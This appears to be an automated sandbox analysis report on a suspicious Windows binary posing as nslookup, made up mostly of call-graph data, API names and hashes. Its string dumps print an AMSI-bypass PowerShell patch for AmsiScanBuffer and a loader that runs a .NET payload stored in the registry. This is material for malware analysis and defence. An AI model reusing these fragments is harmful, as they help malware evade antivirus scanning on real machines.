6676->6672 6679 14000b6ae 6677->6679 6680 140006070 5 API calls 6678->6680 6681 140006070 5 API calls 6679->6681 6680->6673 6681->6682 6682->6640 6683->6672 6683->6673 6683->6675 6683->6682 6684->6683 6685 14000baf4 CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 6684->6685 6685->6684 6687 14000ba50 6686->6687 6734 1400084e8 6687->6734 6690 14000ba75 6692 140006090 _set_errno_from_matherr 5 API calls 6690->6692 6691 14000ba86 SetFilePointerEx 6693 14000ba7a 6691->6693 6694 14000ba9e try_get_function 6691->6694 6692->6693 6693->6650 6695 140006020 5 API calls 6694->6695 6695->6693 6697 14000b7e1 6696->6697 6699 14000b7ee 6696->6699 6698 140006090 _set_errno_from_matherr 5 API calls 6697->6698 6700 14000b4ab 6698->6700 6699->6700 6701 140006090 _set_errno_from_matherr 5 API calls 6699->6701 6700->6657 6700->6660 6702 14000b825 6701->6702 6703 140005f70 _invalid_parameter_noinfo 5 API calls 6702->6703 6703->6700 6705 14000405c 16 API calls 6704->6705 6712 14000ab40 6705->6712 6706 140002080 _handle_error 6 API calls 6707 14000aecc 6706->6707 6707->6683 6709 14000b8c0 11 API calls 6709->6712 6710 140008064 WideCharToMultiByte 6710->6712 6711 14000adc0 WriteFile 6711->6712 6713 14000ae5f try_get_function 6711->6713 6712->6709 6712->6710 6712->6711 6712->6712 6712->6713 6714 14000ae07 WriteFile 6712->6714 6746 140006118 6712->6746 6713->6706 6714->6712 6714->6713 6719 14000b0a8 6715->6719 6716 140002080 _handle_error 6 API calls 6718 14000b191 6716->6718 6717 14000b137 WriteFile 6717->6719 6720 14000b174 try_get_function 6717->6720 6718->6683 6719->6717 6719->6720 6720->6716 6725 14000b1c8 6721->6725 6722 14000b2e5 try_get_function 6723 140002080 _handle_error 6 API calls 6722->6723 6724 14000b300 6723->6724 6724->6683 6725->6722 6726 140008064 WideCharToMultiByte 6725->6726 6727 14000b2a2 WriteFile 6725->6727 6726->6725 6727->6722 6727->6725 6732 14000afa4 6728->6732 6729 140002080 _handle_error 6 API calls 6730 14000b076 6729->6730 6730->6683 6731 
14000b022 WriteFile 6731->6732 6733 14000b059 try_get_function 6731->6733 6732->6731 6732->6733 6733->6729 6735 1400084f1 6734->6735 6737 140008506 6734->6737 6736 140006070 5 API calls 6735->6736 6738 1400084f6 6736->6738 6739 140006070 5 API calls 6737->6739 6743 1400084fe 6737->6743 6740 140006090 _set_errno_from_matherr 5 API calls 6738->6740 6741 140008541 6739->6741 6740->6743 6742 140006090 _set_errno_from_matherr 5 API calls 6741->6742 6744 140008549 6742->6744 6743->6690 6743->6691 6745 140005f70 _invalid_parameter_noinfo 5 API calls 6744->6745 6745->6743 6747 140005ab4 16 API calls 6746->6747 6748 140006121 6747->6748 6749 1400060b0 16 API calls 6748->6749 6750 14000613a 6749->6750 6750->6712 6752 14000c4f8 6751->6752 6753 14000c522 6752->6753 6754 14000c52b 6752->6754 6758 14000c5f4 6753->6758 6756 140006090 _set_errno_from_matherr 5 API calls 6754->6756 6757 14000c527 6756->6757 6757->6618 6759 1400084e8 5 API calls 6758->6759 6762 14000c608 6759->6762 6760 14000c60e try_get_function 6772 14000842c 6760->6772 6762->6760 6764 1400084e8 5 API calls 6762->6764 6771 14000c64b 6762->6771 6766 14000c63e 6764->6766 6765 1400084e8 5 API calls 6767 14000c657 CloseHandle 6765->6767 6770 1400084e8 5 API calls 6766->6770 6767->6760 6768 140006020 5 API calls 6769 14000c69f 6768->6769 6769->6757 6770->6771 6771->6760 6771->6765 6773 140008448 6772->6773 6774 1400084ba 6772->6774 6773->6774 6779 14000847b 6773->6779 6775 140006090 _set_errno_from_matherr 5 API calls 6774->6775 6776 1400084bf 6775->6776 6777 140006070 5 API calls 6776->6777 6778 1400084ac 6777->6778 6778->6768 6778->6769 6779->6778 6780 1400084a4 SetStdHandle 6779->6780 6780->6778 6208 140004c98 6209 140004cb5 GetModuleHandleW 6208->6209 6210 140004cff 6208->6210 6209->6210 6216 140004cc2 6209->6216 6218 140004b90 6210->6218 6212 140004d3b 6213 140004d41 6212->6213 6223 140004d54 6212->6223 6215 140004d53 6216->6210 6230 140004da0 GetModuleHandleExW 6216->6230 6219 140006770 
Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6218->6219 6220 140004bac 6219->6220 6236 140004bc8 6220->6236 6222 140004bb5 6222->6212 6224 140004d61 6223->6224 6225 140004d8e 6224->6225 6227 140004d7d __raise_securityfailure 6224->6227 6226 140004da0 3 API calls 6225->6226 6228 140004d95 ExitProcess 6226->6228 6229 140004d83 TerminateProcess 6227->6229 6229->6225 6231 140004de5 6230->6231 6232 140004dc6 GetProcAddress 6230->6232 6234 140004df5 6231->6234 6235 140004def FreeLibrary 6231->6235 6232->6231 6233 140004ddd 6232->6233 6233->6231 6234->6210 6235->6234 6237 140004c37 6236->6237 6238 140004bde 6236->6238 6237->6222 6238->6237 6240 140005370 6238->6240 6243 14000505c 6240->6243 6242 1400053a5 6242->6237 6244 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6243->6244 6245 140005078 6244->6245 6248 140005248 6245->6248 6247 140005081 6247->6242 6249 140005276 6248->6249 6250 14000526e 6248->6250 6249->6250 6251 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6249->6251 6250->6247 6251->6250 7011 140008798 7012 1400087a4 7011->7012 7014 1400087cb 7012->7014 7015 1400082e4 7012->7015 7016 1400082e9 7015->7016 7020 140008324 7015->7020 7017 14000830a DeleteCriticalSection 7016->7017 7018 14000831c 7016->7018 7017->7017 7017->7018 7019 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7018->7019 7019->7020 7020->7012 6526 14000265c 6527 1400031cc __std_exception_copy 5 API calls 6526->6527 6528 140002685 6527->6528 6947 14000875c 6948 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6947->6948 6949 14000876c 6948->6949 6956 140008334 6949->6956 6951 140008775 6952 140008783 6951->6952 6966 140008560 GetStartupInfoW 6951->6966 6957 140008353 6956->6957 6958 14000837c 6956->6958 6959 140006090 _set_errno_from_matherr 5 API calls 6957->6959 6960 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6958->6960 
6961 140008358 6959->6961 6965 140008386 6960->6965 6962 140005f70 _invalid_parameter_noinfo 5 API calls 6961->6962 6963 140008364 6962->6963 6963->6951 6965->6963 6977 14000823c 6965->6977 6967 140008595 6966->6967 6968 14000862f 6966->6968 6967->6968 6969 140008334 6 API calls 6967->6969 6972 140008650 6968->6972 6970 1400085be 6969->6970 6970->6968 6971 1400085e8 GetFileType 6970->6971 6971->6970 6973 14000866e 6972->6973 6974 140008741 6973->6974 6975 1400086c9 GetStdHandle 6973->6975 6974->6952 6975->6973 6976 1400086dc GetFileType 6975->6976 6976->6973 6978 140006840 _invalid_parameter_noinfo 5 API calls 6977->6978 6981 14000825d 6978->6981 6979 1400082bf 6980 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6979->6980 6982 1400082c9 6980->6982 6981->6979 6983 140006520 3 API calls 6981->6983 6982->6965 6983->6981 6529 14000a460 6530 14000a488 6529->6530 6531 14000a49d 6530->6531 6532 14000a4b6 6530->6532 6533 140006090 _set_errno_from_matherr 5 API calls 6531->6533 6535 14000405c 16 API calls 6532->6535 6537 14000a4ad 6532->6537 6534 14000a4a2 6533->6534 6536 140005f70 _invalid_parameter_noinfo 5 API calls 6534->6536 6535->6537 6536->6537 6791 1400090e0 GetProcessHeap 7027 140007fe0 GetCommandLineA GetCommandLineW

                            Control-flow Graph

                            [Basic-block graph for the function at 1400011d0-140001cdf (rendering and executed/not-executed colouring omitted). Entry block 1400011d0-1400012a4: call 1400020ac, lstrcpyW, call 140003440, VerSetConditionMask * 3, VerifyVersionInfoW; then 1400012a6-1400012db / 1400012e1-14000133a: lstrcatW, lstrlenW, call 1400020ac. The body is a repeated pattern of blocks of the form StrStrIW -> call 140003b30 StrStrIW -> call 1400020a4 lstrlenW call 1400020ac, with call 140004018 on the alternate branch, from 140001372 through 140001c60; the final block 140001ca3-140001cdf calls 1400020a4 and 140002080.]
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: lstrlen$lstrcat$ConditionMask$InfoVerifyVersionlstrcpy
                            • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                            • API String ID: 1817292742-2621229802
                            • Opcode ID: 8d6989b1108e9b88beed039414c685bac2ea253e79904c4a166511710e458325
                            • Instruction ID: 8c57862f1605238ee2c06bc4a536be4fa76e6f6fb4b7f9c0aaabd00b22a72905
                            • Opcode Fuzzy Hash: 8d6989b1108e9b88beed039414c685bac2ea253e79904c4a166511710e458325
                            • Instruction Fuzzy Hash: 395250B571164082FB4AEF27A8553E923A5AB8DBC0F898125FF0A5B3B5EF79C505C301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: lstrcat$Resource$ConditionCreateInitializeInstanceMasklstrlen$OpenUninitializeValue$FindInfoLoadLockSizeofVerifyVersionlstrcpy
                            • String ID: C:\Windows\SysWOW64\WindowsPowerShell\v1.0$EXE$SOFTWARE$nslookstager$nslooksvc32$nslooksvc64
                            • API String ID: 4274016003-783316529
                            • Opcode ID: 18d06a2ddba282ea4376cf9ce3791064666aa5ab65ed9ec89cdded3e60b0d305
                            • Instruction ID: f4174b4eb31990f1079580296cf164b7a62c6f1b6a0cee9ae74924327a9c0852
                            • Opcode Fuzzy Hash: 18d06a2ddba282ea4376cf9ce3791064666aa5ab65ed9ec89cdded3e60b0d305
                            • Instruction Fuzzy Hash: 4C4159B5325A4181FB56EB23F8567DA23A0FB8C7C5F841125BB4A4BAF5EE39C104C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 59578552-0
                            • Opcode ID: 95cd06912afec0fbb9d61b68d8146c6cdd787134d803784d260b7056c70e2e11
                            • Instruction ID: c92f7cab6b7b37efa7c73ce1c18968b7ed43de86ec2d32a3002d8ea4f202b9b8
                            • Opcode Fuzzy Hash: 95cd06912afec0fbb9d61b68d8146c6cdd787134d803784d260b7056c70e2e11
                            • Instruction Fuzzy Hash: D8E0ECF0E1514286F62FF77728523FD21911B4E3A0F600236B321472F3C93D45969A26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: __scrt_fastfail$__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2735655165-0
                            • Opcode ID: bfa21ae437cee570d5880912c16ca5dfbbe9ea07462fb15988f602eba6af7acb
                            • Instruction ID: 9ada0fb4646a4d2952ff16a43c619abef58bc75c83c31e204f1cfd95f41b0cb1
                            • Opcode Fuzzy Hash: bfa21ae437cee570d5880912c16ca5dfbbe9ea07462fb15988f602eba6af7acb
                            • Instruction Fuzzy Hash: 3B315CF120424085FB2BFBA7F4663E92391AB8D7C4F844425BB490B2F7DE7C89458345
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x140001ce0-0x140001ed4; API calls CoInitialize, CoCreateInstance, CoUninitialize; internal call to 0x140002080.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID: powershell
                            • API String ID: 948891078-744010106
                            • Opcode ID: b5d47aab0c085fc6f5d0370f14531f9d0463baa0622061f89ae37b7216d2e8f1
                            • Instruction ID: 2fcec20f5785c010c2d9eaa8757f35663b4795c3a44e5225b6b59df6a9f9c17c
                            • Opcode Fuzzy Hash: b5d47aab0c085fc6f5d0370f14531f9d0463baa0622061f89ae37b7216d2e8f1
                            • Instruction Fuzzy Hash: 6751D2B2B10A848AE701CF76E8903DD27B5FB88B88F409526EF0D57B28DE39C549C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x140001ee0-0x140001fb1; API calls CoInitialize, CoCreateInstance, CoUninitialize; internal call to 0x140002080.
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 948891078-0
                            • Opcode ID: 144a28b6247699ecfe010d9c5c1f4eea69182a90e0887a0d8fa9fb2f193fc2e9
                            • Instruction ID: 0427675daa315fdb8553ced8e820fd3e15db155abe1ee950faa45d10833de8c1
                            • Opcode Fuzzy Hash: 144a28b6247699ecfe010d9c5c1f4eea69182a90e0887a0d8fa9fb2f193fc2e9
                            • Instruction Fuzzy Hash: 2E21C272324B4082E745DF26E88439AB7A5FB88BC4F545026FB8A47B68CF39C449CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 948891078-0
                            • Opcode ID: 0b35923ad0aeec620d72df6b515b73cd9e2fc39d8636088f6dca6bfc77913bfd
                            • Instruction ID: 9c4b1c2941aaf74d21b9dc9fe37141ce250f59d114b31ab7be841ef7d617465f
                            • Opcode Fuzzy Hash: 0b35923ad0aeec620d72df6b515b73cd9e2fc39d8636088f6dca6bfc77913bfd
                            • Instruction Fuzzy Hash: 10111872324B8082E745DF26F88438AB7A5F788BC0F44502ABB8A47B79CE39C4498740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 14e9036ce327040b94fd85b8ac967896ce5c021694fa9181fe595ec70ada6e5e
                            • Instruction ID: bfd4a3926dd071484392c8d5d915de2a2885e5859fdf3ea43dc741f6632be3bf
                            • Opcode Fuzzy Hash: 14e9036ce327040b94fd85b8ac967896ce5c021694fa9181fe595ec70ada6e5e
                            • Instruction Fuzzy Hash: 11E04FF030074482FB6AEB32BC853E92356A78C781F10442DEA4683377CD39C4888711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x140004c98-0x140004d53; API call GetModuleHandleW; internal calls to 0x140004b90, 0x140004d54, 0x140004da0.
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: HandleModule$AddressFreeLibraryProc
                            • String ID:
                            • API String ID: 3947729631-0
                            • Opcode ID: fce81a9c2fcaf56bb6d8420e324a8bfe5ae2be528d4233720d6a25828c74dc0e
                            • Instruction ID: a7743bdd3df87c81feb5d2f0f613f43867c0dc9b6288f7dd08c2f7f9cd14b3ce
                            • Opcode Fuzzy Hash: fce81a9c2fcaf56bb6d8420e324a8bfe5ae2be528d4233720d6a25828c74dc0e
                            • Instruction Fuzzy Hash: 34216FB2A017408AFB66DF79E4447EC37B1E348748F44453BEB1903AA6DB38C589CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: 2c2c038a5e3b1d1c29b39802070b86fbb721499a45cafe52499a78438e435fec
                            • Instruction ID: 313c86ce64bb363a182cb27f5b8d9412f177a72ccfbb8e8da6b1dd424d2ca086
                            • Opcode Fuzzy Hash: 2c2c038a5e3b1d1c29b39802070b86fbb721499a45cafe52499a78438e435fec
                            • Instruction Fuzzy Hash: CC315B76214B8086EB65CF26E8443DE73A4F789798F540126EB9D43BA9EF38C255CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x14000aabc-0x14000af87; API calls GetConsoleCP and WriteFile (two call sites); internal calls to 0x14000405c, 0x140002080, 0x140006118, 0x140009a88, 0x140008064, 0x14000b8c0, 0x140003b30, 0x14000e018.
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: 5ef7af1087c7a8e7be48e6a1a11f233fb9ac17ba864c51c4cfe5f2149e5c165a
                            • Instruction ID: 4e0cce11ff5bdaad7a6fa391402917eead13af23a9c8943a5cb00a957416bb6d
                            • Opcode Fuzzy Hash: 5ef7af1087c7a8e7be48e6a1a11f233fb9ac17ba864c51c4cfe5f2149e5c165a
                            • Instruction Fuzzy Hash: A1D1A0B2708B809AE712CF66E5443DD7BB1F74A7D8F544116EF8A47BA9DA38C15AC300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: 3760536023a7a0084f9fc1ebc8d6c4dc72fe2e3b26b8e374d52cd2af3f56d882
                            • Instruction ID: 564bafd1356223e0270d8fb72979979ce2df0dd9880f0a2c7fe947bf55706a67
                            • Opcode Fuzzy Hash: 3760536023a7a0084f9fc1ebc8d6c4dc72fe2e3b26b8e374d52cd2af3f56d882
                            • Instruction Fuzzy Hash: 18B09234A0BA81C6EA0E6B126C8274422A97B8C750F880218920C52330EB3C00E59700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4261abdbcd26093a6e0c2dd9261226f3ff1e7d4d7e2fc6fb0bd964c57ed1ffb9
                            • Instruction ID: a2cec381f1c5cb8935c8b70a36dfce7d1d7a3b9e76f8d16719536bd815b34dfe
                            • Opcode Fuzzy Hash: 4261abdbcd26093a6e0c2dd9261226f3ff1e7d4d7e2fc6fb0bd964c57ed1ffb9
                            • Instruction Fuzzy Hash: D1F096B27242948BDBAACF2DB85275A77D0F30C3C4F908119E78987B24D63D8061CF48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c1445caa26a304b072041e646faa6bb23e053680ea32fdadc8cf75a4cc13650
                            • Instruction ID: 5b00e86444f2859e0b22f1a0897cc4d4fae77e71b4415575e1e698819c97bd67
                            • Opcode Fuzzy Hash: 8c1445caa26a304b072041e646faa6bb23e053680ea32fdadc8cf75a4cc13650
                            • Instruction Fuzzy Hash: 86A002B1504C40D0E60ACB02F9917D02330F35C380F410852E319530709B389940C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x140003820-0x14000396b; API calls GetProcAddress, FreeLibrary; internal calls to 0x14000e1b0, 0x14000e018, 0x140005710.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 6045ad0de31efca1e8ddcb94de0b9ffcd58d6314be4217ecc2448b59dce27053
                            • Instruction ID: 49beb89a20b18df71a33c33b7a3a8e3fc9d9e10673a02e5114614379e008e528
                            • Opcode Fuzzy Hash: 6045ad0de31efca1e8ddcb94de0b9ffcd58d6314be4217ecc2448b59dce27053
                            • Instruction Fuzzy Hash: 71316FB1312B80A5EE27DB57B800BD92398B74DBE4F594525FF190B7A4DF78C4458300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x14000c41c-0x14000c4d9; API calls WriteConsoleW, CloseHandle, CreateFileW, WriteConsoleW; internal call to 0x14000e018.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: c759f43656eec14f9d398298c1d30b55af2a55c7f1851b28e09130a7d46b6a73
                            • Instruction ID: 923caa0e392d4f45285b0686346bff61248c576a77600dd6e13b5043df0f14dd
                            • Opcode Fuzzy Hash: c759f43656eec14f9d398298c1d30b55af2a55c7f1851b28e09130a7d46b6a73
                            • Instruction Fuzzy Hash: 5C116D72314B8086E752CB57F894799A6A0F78CBE4F044224FB5D877B8CF78C9548740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Control-flow graph (image not extracted): basic blocks 0x140004da0-0x140004dfa; API calls GetModuleHandleExW, GetProcAddress, FreeLibrary; internal call to 0x14000e2b8.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: e1846a0b891334940030055dbf380ec800fe262ad7f1bc0e145d31d485caaf6b
                            • Instruction ID: 8492306c7ed3419d24c313d33fb5f1ef4de63788f1b71c91d435e29b1c35fa9b
                            • Opcode Fuzzy Hash: e1846a0b891334940030055dbf380ec800fe262ad7f1bc0e145d31d485caaf6b
                            • Instruction Fuzzy Hash: 36F0FEF1321A8091FB5ADB62F8943E92364AB4C7D4F44542ABA0B475B5DF78C588D710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: 97f949b9dec87a4f783fd330df64fe45643b705181f7f57e1fcccf984a314c0e
                            • Instruction ID: 72f7c70e39e96c1ec9cf5fa7c31995bb42b818f75ad30bfd369313822aa96c95
                            • Opcode Fuzzy Hash: 97f949b9dec87a4f783fd330df64fe45643b705181f7f57e1fcccf984a314c0e
                            • Instruction Fuzzy Hash: 8881CEB2610A5089FB22DB67A8903ED27A1F74CBD8F444216FF0A677B6DB39C445C720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 58f5f06950dae238faf5d0a65635edd6898ff1f1bcbae38254af54016aa76da0
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 5011A3F6A7AA4102F6569326F495BED10406B5C7F0F644639BB6F177F78B348C414940
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 8656a106d4c9817e8e1a551f2c933fe0b836bd9259f6fbaf6c5506f33ba570a2
                            • Instruction ID: 2d57453f70a64deaa991cab799ba55b0fe103d0fa8c7b0eeb897a7161e11cc0e
                            • Opcode Fuzzy Hash: 8656a106d4c9817e8e1a551f2c933fe0b836bd9259f6fbaf6c5506f33ba570a2
                            • Instruction Fuzzy Hash: 551142F071564186FA67D737B8403E962A96B8CBE0F184624BB690B7F5DA38C841C710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFilterPresentUnhandled$CaptureConcurrency::cancel_current_taskContextDebuggerEntryFeatureFunctionInitializeLookupProcessorUnwindVirtual__scrt_fastfail_set_fmodestd::bad_alloc::bad_alloc
                            • String ID:
                            • API String ID: 4205775026-0
